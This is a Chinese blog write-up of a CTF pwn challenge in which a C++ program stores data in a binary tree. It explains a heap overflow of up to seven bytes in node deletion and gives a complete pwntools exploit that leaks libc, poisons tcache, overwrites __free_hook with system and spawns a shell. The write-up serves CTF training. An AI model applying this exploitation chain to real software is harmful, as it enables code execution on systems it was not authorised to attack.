CTF高质量PWN题之二叉树的漏洞利用

已于 2024-01-13 19:14:10 修改
阅读量239 收藏
点赞数
文章标签: javascript
于 2023-01-09 11:36:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57543652/article/details/128611736
版权

CTF中一道C++数据结构堆风水pwn的利用分享

作者:lemon

分享一道CTF线下比赛中由c++编写的一道高质量赛题。

附件领取:链接: pan.baidu.com/s/1k3Wmf64y… 密码: qpwb

初步分析

程序运行起来看起来似乎是一道常规的菜单堆题:

libc环境:

是Glibc 2.27-3ubuntu1.4,这个版本与2.31版本很像,都有key机制,一定程度上防止了double free的攻击。

回到程序,程序的功能有插入,展示和删除,我们具体用IDA打开来看看程序是个什么逻辑。

可以看到函数列表有非常多的函数(原题去除了符号表,笔者经过逆向重命名了一些函数符号),并且使用c++编写,逆向起来难度更大,如果采取常规的静态分析手段,可能会花费很大的精力,由于题目名字是cxx_and_tree,我们猜测整个程序是用树这种数据结构来存储信息,最经典的莫过于二叉树,我们可以来写个demo来测试程序,如果申请以下堆块,那么堆结构如下面的图:


 add(0, 0x60, 'a')add(4, 0x60, 'a')add(2, 0x60, 'a')add(9, 0x60, 'a')add(3, 0x60, 'a')add(7, 0x60, 'a')

其中0x40大小的为node部分数据,其余大小的为其data数据,将其画为二叉树长成如下样子

左右子树根据其index分如上图,并且通过观察每个node的节点可以确定程序是用二叉树来存储数据。

经过逐步调试和逆向加深对程序的理解后,笔者分析node结构体如下:


struct node
{__int64 idx;// 节点号__int64 user_size; // 用户输入的size__int64 *self_heap_buf;	// 存储数据的bufnode *left;	// 左孩子node *right; // 右孩子node *father; // 父节点
};

具体的漏洞和代码逆向请看下文。

漏洞分析与逻辑触发点

漏洞位于当我们删除某个二叉树节点的时候,如果该节点有左右子树,会调用一个memcpy的函数,这个函数的对于节点size的处理是有问题的。

在申请节点的时候,其size的算法是这样的:

做了一个类似于align的操作,这个操作是很安全的,人为扩展了一下chunk,使得我们能够申请的最大的size和其align之后最小的size一样大,但是下面的删除节点的操作就有bug了:


v2 = (unsigned __int64)tmp_target->user_size >> 3;

写个poc来看下我们能溢出的字节数量


def poc():for size in range(0x10, 0xff + 1):biggerSize = ((size >> 3) + 1) * 8smallerSize = (size >> 3) * 8if biggerSize > smallerSize:print("size:{}, biggerSize:{}, smallerSize:{}".format(hex(size), hex(biggerSize), hex(smallerSize)))

poc()

注意到我们在触发这个逻辑的时候,有部分size是比biggerSize要小的,最多可以溢出7字节。

整个删除节点的逻辑如下:

想要到达漏洞点所在的位置,则该节点必须同时拥有左右孩子节点才可以。

分析下如果该节点同时拥有左右孩子节点,那么删除该节点的时候发生的流程大致如下:

首先是获得该节点中右子树中最小的元素(按idx确定大小,因为下面一直走的是左子树的逻辑)

然后将其要替换的节点传入到带有bug的函数中,在此函数中,程序重新申请了一块buf,然后复制要替换节点的数据到新的buf中,值得注意的是,并没有像我们传统的数据结构中一通乱改指针,而是采用了一个复制的思想,但是新创建的buf的size给少了,控制得当能够溢出七个字节。

然后再往下的逻辑就是删掉刚才的右子树中的最小节点,因为其数据已经拷贝到原本要删除的节点当中。

在这里我有个疑问,既然之前选到了右子树的最小的节点,那么为什么还要判断其是否还有左子树呢?上面的分支应该永远不会进入,或许是出题人为了增加逆向难度,又或者是出题人面向ctrl+CV编程。

然后进入一个删除节点的函数:


unsigned __int64 __fastcall delete_leaf_node_or_right_children(struct node **father_node, struct node **to_delete_node, struct node **tmp_father_node) {struct node *v3; // rbxstruct node *v4; // rbxstruct node *v5; // rbxstruct node *v6; // rbxunsigned __int64 v8; // [rsp+28h] [rbp-18h]v8 = __readfsqword(0x28u);if ( *to_delete_node == *father_node )// only root node{if ( *((_DWORD *)father_node + 4) == 1 )// only a node{v3 = *to_delete_node;if ( *to_delete_node ){deleteNode0((__int64)*to_delete_node);operator delete(v3);}*father_node = 0LL;--*((_DWORD *)father_node + 4);*to_delete_node = 0LL;}else// has right children{*father_node = (*father_node)->right;(*father_node)->father = 0LL; // because of the "to_delete_node == father_node", the children will be the root nodev4 = *to_delete_node;if ( *to_delete_node ){deleteNode0((__int64)*to_delete_node);operator delete(v4);}*to_delete_node = 0LL;}}else if ( *to_delete_node == (*tmp_father_node)->left )// if the node to delete is in the left of its father node:{(*tmp_father_node)->left = (*to_delete_node)->right;// change parent ptr and children ptrif ( (*to_delete_node)->right )(*to_delete_node)->right->father = *tmp_father_node;v5 = *to_delete_node;if ( *to_delete_node ){deleteNode0((__int64)*to_delete_node);operator delete(v5);}*to_delete_node = 0LL;}else// if the node to delete is in the right of its father node:{(*tmp_father_node)->right = (*to_delete_node)->right;if ( (*to_delete_node)->right )(*to_delete_node)->right->father = *tmp_father_node;v6 = *to_delete_node;if ( *to_delete_node ){deleteNode0((__int64)*to_delete_node);operator delete(v6);}*to_delete_node = 0LL;}return __readfsqword(0x28u) ^ v8;
}

分为两种情况删除,一是叶子节点,另外就是还有一个右孩子节点,删除的方法很普通,就是普通数据结构中学的删除方法一样。

漏洞利用

完整exp如下:


from pwn import *
import sys

arch =64
challenge = "./pwn1"
libc_path_local = "/glibc/x64/1.4_2.27/libc.so.6"
libc_path_remote = ""

local = int(sys.argv[1])
elf = ELF(challenge)context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-hp', '65']

if local:if libc_path_local:io = process(challenge,env = {"LD_PRELOAD":libc_path_local})# io = gdb.debug(challenge, 'b *$rebase(0x279f)')libc = ELF(libc_path_local)else:io = process(challenge)
else:io = remote("node4.buuoj.cn", 25965)if libc_path_remote:libc = ELF(libc_path_remote)

if arch == 64:context.arch = 'amd64'
elif arch == 32:context.arch = 'i386'

def dbg():context.log_level = 'debug'

def echo(content):print("\033[4;36;40mOutput prompts:\033[0m" + "\t\033[7;33;40m[*]\033[0m " + "\033[1;31;40m" + content + "\033[0m")

p = lambda: pause() 
s = lambda x: success(x)
re= lambda m, t : io.recv(numb=m, timeout=t)
ru= lambda x: io.recvuntil(x)
rl= lambda: io.recvline()
sd= lambda x: io.send(x)
sl= lambda x: io.sendline(x)
ia= lambda: io.interactive()
sla = lambda a, b : io.sendlineafter(a, b)
sa= lambda a, b : io.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))

bps = []
pie = 0

def gdba():if local == 0:return 0cmd ='b *$rebase(0x1ee2)\n'if pie:base = int(os.popen("pmap {}|awk '{{print ./pwn1}}'".format(io.pid)).readlines()[1],16)cmd +=''.join(['b *{:#x}\n'.format(b+base) for b in bps])cmd +='set base={:#x}\n'.format(base)else:cmd+=''.join(['b *{:#x}\n'.format(b) for b in bps])gdb.attach(io,cmd)

_add,_free,_show = 2,3,1

menu = "3.remove_information"

def add(idx, size, content):sla(menu, str(_add))sla("idx:", str(idx))sla('size:', str(size))sa("content:", content)# ru('addr=')# return int(io.recv(5), base=16)

def free(idx):sla(menu, str(_free))sla("idx:", str(idx))

def show():sla(menu, str(_show))

def exp():for i in range(8):add(i, 0xd0, 'a')for i in range(7):free(i)add(8, 0x20, 'a')show()leak = uu64(ru('\x7f')[-6:]) - 289 - 0x10 - libc.sym['__malloc_hook']libc_base = leakecho('libc base:' + hex(libc_base))free(7)free(8)add(7, 0xdf, 'z' * 0xdf)add(4, 0xd0, 'a')add(2, 0xd0, 'a')add(11, 0xdf, (p64(0) + p64(0xd1)) * 2)add(10, 0xdf, 'c' * 0xdf)add(15, 0xdf, 'd' * 0xdf)add(13, 0xdf, 'e' * 0xd8 + p32(0x71).ljust(7, '\x00'))# The last one chunks are buF areas of Number 3# The last two chunks are buF areas of Number bfree(11) # 5c0 will corrupt __free_hook = libc_base + libc.sym['__free_hook']system = libc_base + libc.sym['system']free(4)add(4, 0x60, p64(0) * 6 + p64(0) + p64(0x31) + p64(__free_hook))add(0, 0x2f, 'a')add(3, 0x2f, 'a' * 0x28 + p32(0x51).ljust(7, '\x00'))free(2)free(0)free(4)free(15)free(10)free(13)# Get the second chunk of 0x30add(13, 0xd0, 'a')add(10, 0x2f, 'a')add(15, 0x2f, 'a')add(14, 0x2f, 'l' * 0x28 + p32(0x31).ljust(7, '\x00'))free(13)free(10)free(15)add(10, 0xd0, '/bin/sh\x00')add(8, 0x2f, '/bin/sh\x00')add(13, 0x2f, '/bin/sh\x00')add(12, 0x2f, p64(system) + p64(0) * (0x28/0x8 - 1) + p32(0).ljust(7, '\x00'))free(10)free(8)

exp()
ia()

漏洞其实并不太好利用,分析原因如下:insert节点的时候会额外申请别的堆块出来,整体的堆布局我们其实并不太好控制,所以漏洞利用的时候会有时不可控,我们需要反复的调试,现给出exp的书写思路。

泄露libc基址


 for i in range(8):add(i, 0xd0, 'a')for i in range(7):free(i)add(8, 0x20, 'a')show()leak = uu64(ru('\x7f')[-6:]) - 289 - 0x10 - libc.sym['__malloc_hook']libc_base = leakecho('libc base:' + hex(libc_base))free(7)free(8)

在2.27下,只要循环填满tcache即可很容易的泄露出libc

布置二叉树


 add(7, 0xdf, 'z' * 0xdf)add(4, 0xd0, 'a')add(2, 0xd0, 'a')add(11, 0xdf, (p64(0) + p64(0xd1)) * 2)add(10, 0xdf, 'c' * 0xdf)add(15, 0xdf, 'd' * 0xdf)add(13, 0xdf, 'e' * 0xd8 + p32(0x71).ljust(7, '\x00'))

可以看到,我们在输入content的时候会输入一些很奇怪的值,这个时候的值我们是无法确定的,必须结合后文来慢慢调试。

初始状态如图所示,这个时候我们去free11,将会到达漏洞所在逻辑的位置处,让程序触发漏洞。

此时堆空间的布局如图所示

可以看到这个时候其实已经利用了漏洞改写了下一个堆块的size位,形成了overlap

下面是关键操作,劫持tcache数组的0x30大小的chunk的fd为hook


 free(4)add(4, 0x60, p64(0) * 6 + p64(0) + p64(0x31) + p64(__free_hook))

此时的bins情况:

此时的二叉树为:

因为现在已经将freehook链入到tcache里面,下面我们的工作主要就是围绕怎么将其申请出来而努力,首先直接申请是肯定不行的,我也没有深究,因为申请的时候会首先申请两个chunk出来,然后将其free掉,然后再做一系列的memcpy操作,在这一系列的过程中,无法保证中间chunk的合法性能够绕过检查,所以我们还是利用漏洞点申请不同size的chunk的这一特性努力,我们可以逐个布置满足要求的二叉树节点,然后利用漏洞来申请出来这个chunk。

第一轮申请

 add(0, 0x2f, 'a')add(3, 0x2f, 'a' * 0x28 + p32(0x51).ljust(7, '\x00'))free(2)

布置完如下node,二叉树为:

堆布局为:

可以看到还有两个node就可以申请到freehook。


 free(0)free(4)free(15)free(10)free(13)

清除一些无关的node,为我们布置节点做好铺垫。

第二轮申请

 add(13, 0xd0, 'a')add(10, 0x2f, 'a')add(15, 0x2f, 'a')add(14, 0x2f, 'l' * 0x28 + p32(0x31).ljust(7, '\x00'))free(13)

此时二叉树为:

堆布局为:

清除一些节点来重新布置


 free(10)free(15)
第三轮申请并getshell

故技重施,最终可以申请到hook所在空间并getshell


 add(10, 0xd0, '/bin/sh\x00')add(8, 0x2f, '/bin/sh\x00')add(13, 0x2f, '/bin/sh\x00')add(12, 0x2f, p64(system) + p64(0) * (0x28/0x8 - 1) + p32(0).ljust(7, '\x00'))free(10)free(8)		# getshell

本文到这里就结束了,如果有疑问或者任何不当之处欢迎联系笔者进行技术交流:lemonujn@gmail.com

说明

关于合天网安实验室

合天网安实验室(www.hetianlab.com)-国内领先的实操型网络安全在线教育平台 真实环境,在线实操学网络安全 ; 实验内容涵盖:系统安全,软件安全,网络安全,Web安全,移动安全,CTF,取证分析,渗透测试,网安意识教育等。

相关实验练习

CTF实验室-从入门到实践-一站式CTF学习平台

方班网络安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF PWN 武器库
12-12
CTF PWN 武器库或rifle,利用fastbin堆溢出得shell,
ctfctf-pwn收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
2023HDCTF部分wppwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 923
HDCTF部分wp,指我a出来的
2023-香山杯pwn-wp
hanbing0126的博客
10-17 162
main.py里面加上sys.path.append来帮助python导入app这个库。还得是调试了之后就知道怎么做了(当时一直在找magic gadget 找不到233)还有read函数可以泄露出libc的版本(貌似就是ubuntu22.04。然后剩下的就是leak canary然后打libc的ROP了。栈上有关IO的函数都与libc有关(也就是glibc那个。库与库之间的偏移是不定的,需要leak出libc的地址。而栈上可以泄露出libc的函数 比如open64等。了解了不同的库之间的调用关系。
最新CTF目合集_网络安全ctf大赛库(3),大厂内部资料
2301_79985178的博客
05-13 833
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[SICTF2023] Misc 高质量 WriteUp
qq_47875210的博客
01-19 2847
这道目很早就出来了,但是一直没师傅做,我也不知道为嘛,那个时候没进比赛群,然后我就说我来试试,然后遇到了目的出错的问。注意:这个目他用了一个randit(0, 2),这个函数就会导致可能是在B通道,可能是在G通道,或者是在R通道,也就是说0的时候是B通道,1的时候是G通道,2的时候是R通道,因为cv2读取图片后就是BGR的通道顺序。这个目不知道怎么评价,因为他的出的那个脚本,我把逆代码写出来后还是得不到清楚的图片,因为我已经做出来了,就找树木反应,树木给了正确解代码,然后拿到正确解代码。
FSCTF 2023(公开赛道)(pwn持续更新中)
沈理大学牲的博客
11-28 529
file一下,64位,ida打开关键函数部分:检查用户输入的命令中是否包含"cat"、"flag"、"sh"或者"$0"这些关键词,如果包含,则输出"invalid command";否则关闭标准输出,然后调用backdoor函数。在backdoor函数中system(a1);存在,a1是buf也就是输入的我也是看了wp才知道的,还得多练直接 nc node4.anna.nssctf.cn 28229然后输入 tac fla* >&2。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1734
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习 可用于练习基础的ROP
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
NewStarCTF 2023 Week2 官方WriteUp(转载)
qq_65165505的博客
10-15 4583
原文连接:NewStarCTF 2023 Week2 官方WriteUp 一.web 1.游戏高手 考点:JavaScript分析 FLAG:动态FLAG 解步骤 去查看源代码中的app_v2.js文件内容,可以看到在游戏结束的处理时代码如下: function gameover(){ if(gameScore > 100000){ var xhr = new XMLHttpRequest(); xhr.open("POST", "/api.php
SHELL CTF 2022目及wp
Laffrey的专栏
08-16 380
https://gitcode.net/rickliuxiao/shellctf2022 SHELLCTF2022 真wp
[wp]NewStarCTF 2023 WEEK4|WEB
m0_63138919的博客
10-23 1038
本文为[wp]NewStarCTF 2023 WEEK4|WEB 的解思路
pwn】2022 祥云杯 部分wp
woodwhale的博客
10-31 1171
2022 祥云杯 pwn 部分wp,有空复现别的
[irisctf 2023] pwn部分
weixin_52640415的博客
01-09 723
irisctf 2023 pwn
砰砰砰!2021美团CTF决赛PWN详解
MachineGunJoe666
06-30 945
nullheap 程序分析 Add() Delete 很正常的delete 思路 offset by one, 简单的漏洞, 还可以泄露地址 确定下libc版本 利用offset by one 溢出一个修改一个chunksize为0x90, 然后释放他, 如果是2.23的那么就会触发向前合并, 引发错误, 如果是2.27就会直接进入tcache, 不会报错 根据libc地址确定是libc2.23-UB1.3 泄露地址 格式化字符串泄露地址 任意写 UB隔块合并打fastbin, 利用0x7F伪造size,
[Vue-常见错误]浏览器显示Uncaught runtime errors
最新发布
一个喜欢什么都研究一下的小小后端程序员
06-09 304
在vue.config.js中配置关闭Uncaught runtime errors显示。
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统控制权。 CTF 简单 PWN 目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 目,从初学者到专业选手都能找到适合自己水平的目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方班网络安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值